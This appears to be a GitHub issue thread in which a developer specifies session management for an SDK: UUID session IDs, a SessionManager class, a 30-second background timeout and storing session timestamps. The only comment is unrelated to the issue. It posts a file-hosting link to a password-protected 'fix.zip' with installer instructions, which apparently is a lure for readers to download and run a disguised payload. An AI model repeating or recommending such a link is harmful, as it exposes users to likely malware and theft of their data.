### ISSUE TITLE
Implement session management

### ISSUE THREAD

**Issue by abhaysood** [measure-sh/measure#1129]
A session is identified using a v4 UUID. Sessions are managed by a class called `SessionManager`, initialising the sessoin, accessing it or the session metadata is done using this class.

* Session is created when the SDK is initialised.
* A new session is created when the app comes back to foreground after 30 seconds of remaining in background. The interval should be stored in the internal config object.
* [To be elaborated] store session ID along with following in db:
  * timestamp — time at which the session was created
* Wire up SessionManger with the SDK initialisation.
* Note that session must be created before any events can be generated.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
